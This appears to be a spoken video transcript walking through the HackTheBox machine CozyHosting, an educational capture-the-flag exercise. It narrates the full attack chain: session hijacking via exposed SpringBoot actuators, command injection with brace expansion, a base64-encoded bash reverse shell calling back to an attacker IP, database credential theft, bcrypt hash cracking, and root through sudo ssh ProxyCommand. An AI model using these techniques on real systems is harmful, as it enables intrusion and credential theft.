What's going on YouTube? This is IPSEC. I'm doing cozy hosting from HackTheBox, which starts out with just a web page. And the next step can be pretty tough to find if your recon game isn't good because you have to identify the framework being used, which is SpringBoot, because if you use that, it points you to a SpringBoot word list that you can use for dir busting that has a magic word called actuator in it. An actuator is a debug thing developers can do to SpringBoot applications in order to get some extra information out of it. The session actuator lets you query all the sessions on the web page from just a GET request. So we can do that, dump the sessions, do a session hijack, become admin. That leads to a place where there's a basic RCE vulnerability. We get into the server, then we have to unzip the Java app, look at the properties, get the PostGres credential, which lets us crack a password, and then we get to another user that can do a GTFO bin with SSH through the ProxyCommand functionality, and we'll spend a little bit of time explaining what a proxy command is in SSH, so let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it cozy hosting, then the IP address of 10.10.11.230. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one being SSH on port 22, and its banner tells us it's an Ubuntu server. Then we have HTTP on port 80. Its banner tells us it's nginx, also running on Ubuntu, and it's redirecting us over to CozyHosting.htb. So let's go ahead and add this to our host file. So sudo v etc host. Then we can do 10.10.11.230 and CozyHosting.htb. So let's just go take a look at the website because there's not much else for us. So I'm going to go to HTTP 10.10.11.230. It's going to redirect us over to Cozy Hosting once I tell Burp Suite not to intercept. So going here, it looks like we have the page, and Cozy Hosting is some type of web hosting business. So the first thing I want to do is kind of look at where I can interact with the server, because right now it just looks like a single page. If I click on any of the business plans, it redirects me back to the top, home, services, pricing, login. So login is really the only place I can interact with it. So let's just try logging in with admin to see if we can get in with default credentials. No luck there. So at this point, I want to start a Go Buster so I have some type of recon running in the background. So I'm going to do a Go Buster directory mode -u cozyhosting.htb opt seclist discovery web content, then raft small words.txt. Okay, so now that we have that running, it is going to tell us all the pages we have. There is a /admin, but we get a access denied message. /error goes to 500. But we really want to identify what framework is being used here. So I'm going to send another login request, and we're going to examine the response. And right off the bat, I see JSESSIONID. And whenever I see JSESSIONID mixed with nginx, I always just test for like .. vulnerabilities. So I'm going to go in the repeater tab. And since it's doing /login, I really doubt there's an nginx rule mapping specifically /login to the Tomcat or Java server. So I really don't think it's going to be some type of off by / thing, but there is kind of a way we can check that. If you look at the headers, we see there are 12. And let me change this over to a GET request real quick. Change request type method. There we go. It's not going to be valid for this one, but I like doing a GET because eventually I'm going to try to get to like /manager /administrator /examples, which are common things in Tomcat. And I'm just thinking Tomcat because I see JSESSIONID, right? So that's why I changed to GET right there. But I see 13 different headers. If I just do a GET on /, let's see how many headers there are. There's 13. So normally when it passes to a different middleware, that may add some type of header. You normally see it like X powered by, but I mean, normally nginx just won't send out this X content type. So we can further test it with like .. And right here, we're seeing nginx is just saying this is a bad request right away. If I add a semicolon here, now we hit the Tomcat server, but because we're at /, there's no chance for an off by slash vulnerability that would allow us to do directory traversal here, right? Because for that off by slash thing to happen, it needs to have like a location, and then we can say Tomcat app. So anything that nginx sees as this, it would redirect. But since we're at the parent directory, it's this. So there's no way that this location can't end with a slash. In that example, the Tomcat app needed a trailing slash. If you are confused, check out the nginx off by slash, but I just wanted to go my logic why I'm not going too much down that road. We could try like manager HTML, that Tomcat path. We get a error there. If we do it this way, we get a bad request. And oddly enough, I don't know why this. Oh, that's a 400, not 404. So Tomcat just doesn't know how to handle that. But let's go back to what we saw before with manager HTML. We have this 404 error page, and this string is indicative to SpringBoot. If we Google white label airspace, let's turn Burp Suite off, google.com. Here we go. SpringBoot, SpringBoot, SpringBoot. So almost everything is going to be SpringBoot. And if we look at our Go Buster, we're not really finding anything here. It hasn't really gave us any new results since it started, but there are a specific word list related to SpringBoot, right? I'm just going to grep for Spring. There we go. So here we go. Let's run this one because it's directed at the framework that's being used. So we'll do go buster dir -u CozyHosting.htb word list like that. And we see they left the actuators open. The actuators are mainly debug endpoints for SpringBoot applications. They really should not be accessible, but in this case they are. So if I go to actuator env, we see it giving us information about the environment, right? Let's see the path. Let's see what this one looks like. If we go here, there's nothing really too sensitive. It does filter out the value by default, so we can't access that. Let's check out mappings. So let's see what the mappings looks like. It's just got a list of all the endpoints. So if we're doing some type of API testing, this would be helpful. I actually don't know what ExecSSH is. That must be specific to the application because we can see HTTP cloud hosting execute over SSH, and it's giving the parameters. So we could try sending a post right here. I've never done that. Let's just try sending a post request right now. Post. And if you're familiar with like other API things, this would be like getting a Swagger documentation because it's just telling us a list of all the endpoints. So if we do post execute SSH, we sent it, and we still get a error. Let's see. We have to figure out exactly what this URL is. Handler method. Does it tell us anything? It's probably under like admin or something like that. Consume, only the method, the pattern. It's not telling us the parameters. Huh. Let's see. Let's search for login. Oh, there's a parent here. I wonder if execute SSH is under something else. So 9, let's go up to the top. 0, 1. No. This is reading like I should be able to access it because we see get actuator mappings and then post execute SSH. So I'm not exactly sure what's going on here. I don't think we're supposed to hit this anyways, so it's failing successfully. I just don't understand why we're getting a white label error space. I would expect something slightly different, but oh well. I don't know SpringBoot. But I would look at each of these endpoints. We have /admin. There is a add host. It's not telling us if that's a get or a post. Same with login. So I guess if it doesn't say it's a get, so we could also change the request method, add host. We also get that error. So let's just go back to what we had, and let's go to actuator sessions. So if we go to actuator sessions, we have unauthorized. This is probably going to be our session. Let's look at our burp. 877 ends in CB, 877 ends in CB. Then we have a session for K. Anderson. So this actuator is just listing all of the sessions. And we'll get into how you can disable this probably in a little bit, but I do want to try this. Okay. I was putting J. Anderson's session here and hoping it wouldn't give the white label error space, but it still does. So I have no idea what the mapping thing is in this. So I'm going to right now, I went in my developer tools. I'm going to change my J session to J Anderson's. Then we're going to refresh. And I noticed the login disappeared. And if I go to /admin, it is no longer a denied. I get into the admin page. And we can see there's some type of billing thing here. And then there's a connection setting for this, the Cozy scanner. So I'm going to give my host name of 10.10.14.8. I want to do IPsec. And I'm going to listen on port 22. I don't think the servers on HackTheBox can reach back to port 22 though. So if I submit, we can't. And connection timed out. If I do 127.0.0.1, port 22, what happens? Host key verification failed. So the host was not added. Let's go to Burp Suite and intercept this request. So 127.0.0.1, IPsec, send it on over. And let's see, can I change the port? So SSH does allow for ports. So if I do man SSH, lowercase p. So if I do lowercase p, let's change it to 8,000. And I want to see if I can make the server connect back to me. So we do this, we get a redirect, and it's invalid hostname. So I guess they don't want spaces in the hostname. We can try to get rid of spaces by doing, I think it's brace expansion, by putting them in brackets and then a comma where we want the space. And we still get invalid hostname. So if you are unfamiliar with that technique, let's do echo, and then we can say, please subscribe. And it's going to just expand what's in here using space as a delimiter, and it puts a space. So that's what I'm doing there. It's a tricky way to get spaces in. Another way is using the IFS operator. So we can just do IFS like this. I want to say we have to use brackets as well. So I don't think this is going to work either. We still see invalid hostname. So we can't do anything there. I was still even going to 127.0.0.1, but invalid hostname. So they have some type of good filter here. Let's try it over here on the username. So if this is just using bash on the back end, right? It's probably doing SSH user at host. So, oh, I was adding like -b here, and that's probably what screwed it up, right? It always helps just thinking about what you're doing, right? I was trying for some type of parameter injection, which would mean it's command injectable. And I didn't think about the command. I guess it could have been like -u for user and then like that, right? But most people, when they SSH, they use the @ right? So of course that's a bad host name. But what if we put the -p back here, right? That's my next logic. So let's do -p, 8,000, IPsec. And we say username can't contain white spaces. So let's do that brace expansion thing again. And we have bad port. Never connected to us. And that is odd. Bad port. Dash capital P. Well, we got an SSH error message. So we know we have something. So we have command injection, definitely. I'm not sure why it did that, though. Let's do ipsec-p 8000. Still bad port. So I'm not sure why we can't change the port here, because we should be able to put the -p flag. But I'm going to kind of ignore that, because when we did something weird, oh, well, we have it right now. We have the error message. And this is SSH's error message. So we definitely have command injection. I'm going to try a sleep 1. And let's see. I'm going to do a semicolon sleep 1. No. Let's do semicolon there. And here. And there we go. So now we have command execution, right? When you do this brace expansion, you have to keep it on the same thing. So when I was doing this, it was treating this as part of the argument. Let's see if it shows it. It doesn't do it here. I wonder if I just needed it on the outside. Because, nope. We definitely want it on like this. So we have command execution. I wonder what happened if we just did a semicolon. What if we did a comment? It just times out. I think we probably have to URL encode it. Okay. I was just thinking about like fuzzing. I always like playing with these type of things. So we have command execution. We want to get a shell. So let's do echo. Let's get a reverse shell. So I'm going to do v shell --i dev tcp 10.10.14.8 9001 0 and 1 like that. Okay, base64-w0 shell. And I'm going to get rid of all the pluses because that's a dangerous character in HTTP that I just hate dealing with. That's probably right here. Okay, and we got another plus. That's probably right here. And we can get rid of those equals. That's got 2 padding. So if I added 2 spaces, there we go. Now it's just pure alphanumeric. So if we copy this, we can echo that in. Then I'm going to do base64-d. And then I'm just going to echo it to bash. And let's see, we have it not working. I wonder if I need to put bash like this. We did not get a shell. Let's see. Oh, it should be on 9001. Echo base64-d. Do we need a -n? Let's try this command on our local box. Bash not found. Okay. So you can't put bash in this. There we go. It's hanging and we get a shell. So that's why I like always making my payloads as simple as possible, because I knew the error wasn't going to be around this, right? I'm going to take a step back and I want to see if I can prove a point real quick. So if I do v shell, or let's do cp shell to vanilla shell. And I'm going to have spaces in my payload. And if we copy this and we paste this in, when we're doing it this way, we now have two errors potentially, right? This is going to be an error, and then we don't know exactly how it's treating that plus. So if we had fixed this and didn't think about going back to fix this plus, it's still going to fail, right? Let's go here. Whoops. That's definitely going to fail because we pasted it twice, right? This is not working because it's encoding these pluses. If I make that a URL encode, okay, that's probably HTML encode, then it probably works. No? Let's see. Listing on 9001. Oh, we still have it twice. So 302, I'm going to URL encode this. Still 302. That should have worked. I have no idea what just happened there. If we execute vanilla shell, that does work. Base64-W, vanilla shell. We need to say 0. This little proving a point thing took a little bit longer than I wanted it to. I thought this would be simpler. Okay, the base64 is bad. It's still not working, right? So if I now URL encode this, it works. So you can work with like making your payload, like not worrying about this if you just always get in the habit of URL encoding it. But I really hate like when you first paste it that there's two potential error things, and you knew before you even started this command that this could be an issue because pluses are always bad in web packets. So I just think it always is beneficial to spend the extra couple seconds to make your payload more flexible and get rid of those encodings before they even start, right? So let's listen. There we go. So I'm going to upgrade my shell. Let's do Python 3, import pty spawn, bin bash. Okay. Then stty raw minus echo fg, enter. Export term is equal to x term, so I can clear the screen. And now I have like tab autocomplete and everything like that. So as the web user of this box, the first thing I want to do is try to get the password of the user. I want to say it was like Jay Keaton or something, because when we logged in as him, we just stole his session and then put that in. So we never got the password or password hash. And normally the web user has the ability to view that type of information. So let's go take a look at where we are. So we have this cloud hosting jar. And normally when you host a Java app, it will expand the jar somewhere. So I'm going to do a find slash pipe errors to dev null, and I'm going to grep for cloud hosting. And that did not work. Like that. There we go. And the only thing is this one jar file. So we could just start extracting this jar and looking in it. But what we could also do is look at how this is hosted, right? And you could do like systemctl. What is it? I think it's list unit and then type equals service. I think that's the command for this. Let's see. Let's just Google systemctl list services. I normally don't do it this way because I can't remember all these systemctl commands. Let's see. All services running. It's probably like list unit files or something. Units. There we go. And you can see all the services that are running. One of them is probably going to stick out. Let's see. Do we have it? My terminal size is bad. The other way you could list the services that are running would just be find/etsy then -name star.service. And that will list all the services here, right? And if we go through, let's see, do we have anything that sticks out? Grub. Oh, CozyHosting. There it is. I bet that was in the list units. If I grep for Cozy, there we go. But if we just go here, let's go up. We can grab this. And this is going to be how systemd starts this service, right? So we go into the user group app, and then it's going to just execute Java. So it's not using Tomcat or anything at all. So that's why we couldn't access like the manager interface or things like that. So let's extract this jar. So to do that, I'm going to copy it over to my box. So I'm going to make dir source, I guess, and then we can say nc lvmp 9001 cat cloud hosting to my IP. I did not direct it to a file. To CozyHosting.jar. That would definitely help. There we go. So it's sending me the file, and this should finish, give me a prompt back when it's done copying. There we go. And then we can say 7zx to extract CozyHosting.jar. And then we have all the files. So if I go in, let's see, let's do find.-name star.properties. And there's two. We have the POM and the application. If we look at the application, this is going to be where the actuators are configured, right? We can see management, endpoints, web exposure, include, health, beans, environment, sessions, mappings. So this is all the actuators, and we can see they're enabled. So if you wanted to disable them, you change that to false. We see Postgres credentials right here. So the first thing I do is try su-postgres, paste in the password to see if we can get a shell. Does not look like we can. We could probably do psql-u postgres. Let's see. Is it -U? Then h localhost. Let's see. Peer authentication failed. We probably need a password. Is it lowercase p for this? Let's see. Postgres, or let's do PSQL connect. Connecting to Postgres using PSQL. Lowercase h, lowercase p for the port, d for database name, -u for database server. So h, localhost, -u, was it capital U? HDU. I don't know why I didn't ask for the password before. And I copied way too much. Copy this. Paste. There we go. So now we're on Postgres. Is it /dt to enumerate tables? Let's see. Postgres enumeration. Let's do hack tricks. Postgres is a little bit weird how you do enumeration. So this is generally what I do. Don't memorize all the commands, memorize how to get to them. So you can do -list or /list to list the databases. So you have CozyHosting, Postgres, template 01, template 02. So we want to use CozyHosting. And then let's see. /d is going to list the tables. I thought. I'm going to exit I'm going to specify the database CozyHosting. Copy, paste. There we go. It's probably not use. Let's do \d. There we go. We have host, host ID sequence, and users. So if I did select star from users, we can see two. We have K Anderson and admin. So let's grab these hashes. So I'm going to grab this, and we can v hashes, and we can go K Anderson like that. Then admin. Like this. And now we want to go over to the Kraken to crack them. So copying them. And then we can SSH over to Kraken, go inside of hashcat, drop the hashes here. I'm going to call this CozyHosting, paste. And now we can crack. So I'm going to do hashcat -- username. I think it's username for the flag. It's username because whenever I use hashcat, I like putting username : then the hash. That way, when it cracks, it stores the username it went to. It just makes life easy. Hashes, CozyHosting, and opt wordlist rocku.txt. And it is going along, and we need to specify the hash. So I'm going to guess this is just a bcrypt hash. Let's look at it real quick. Hashes cozy 2 star. Yeah, that is probably going to be bcrypt. So -m3200. There we go. And if this doesn't work, I'd always try a different hash as well. And if there was a register user endpoint, I would register a user because that way I know my password hash, put it in the database, and then attempt to crack it to make sure my mode is correct, right? Because the application itself could always be doing something weird, like putting a hash beforehand, like salting it in a non-standard way, which would then break cracking until you realize what it's doing. So we have one hash, Manchester United. We don't know the username though. We could just look at the hash file and get it that way, or I can just do a -- show, and we see it goes to admin, right? That's why I like always doing the username, because it helps that way. So let's go back to our box. I just do Control-D to exit. I think \Q would as well. Let's cat etc passwd grep for everything that ends in sh, because those are going to be the shells. And I'm going to guess admin is going to be Josh. So I'm going to do su Josh. And I always like doing su space -- like that. And then put his password in. That was the hash. That was not it. Let's grab it. There we go. Su Josh. Paste it in. And we get access as Josh. If we do lsla, we can see user.txt. We can try a sudo -l and see we can run SSH as root. So let's go over to GTF opens and see if there's any known privesc there, right? If I go to SSH, we see a sudo rule, and through sudo, we can use ProxyCommand to get a shell. So let's try this. Let's do sudo, and then I'm going to say user bin SSH, and then ID, and we get root. And that may look weird. Why does the proxy command work that way? The proxy command itself is able to run a command before it runs SSH. And you may be asking, why would I ever want to run a command before I SSH into something, right? And the answer to that is whenever you have boxes that you have to establish a SSH tunnel to in order to access, right? So let's say our client is over here. This is our client, and we want to SSH to web, which is over here. However, there's some type of firewall in play that is preventing us from just going straight here. This blocks the connection. So we can't just SSH directly to web. However, there is a bastion host that we can SSH to, because this guy has better security policies around it, and it's just being monitored, right? So we could SSH down here. Let's get rid of that. And then from there, we can establish a SSH tunnel. So we could say like -L, let's listen on port 9022. And then any connection there goes through the bastion, ends up on web port 22. And then we SSH here, right? That works. The annoying thing is whenever we type SSH web, but don't have this tunnel up, it's going to fail. And that's just a huge annoyance. So what the proxy command allows us to do is say when we type SSH web, type this command over here first and make sure that gets established, because then we can just go to web and we don't have to worry about the bastion because it's automatically going to run that beforehand. And it just makes life really easy. And if you don't see that making your life easy, I'm guessing you're thinking that most people, when they use proxy command, always type -o proxy command equals. And no, most people, when they use proxy commands, they'll put it in like an SSH config, right? So if I go in .ssh config, we can see this is the SSH config file. And let's say the box Kraken, I couldn't reach directly. Let's say I needed to go through a different box called Bastion in order to access it. I would just simply put a proxy command here. So I could do proxy command. I'm going to do camel case like that. And then I want to say the syntax would be like -W %H:%P for host and port. And then it would be Bastion, right? So whenever I ran the command SSH Kraken beforehand, it would set up the tunnel with proxy command to Bastion to get it set up, right? So that is how most people use proxy command. So hopefully you guys enjoyed that, and that's going to conclude the video. So with that being said, take care, and I'll see you all next time.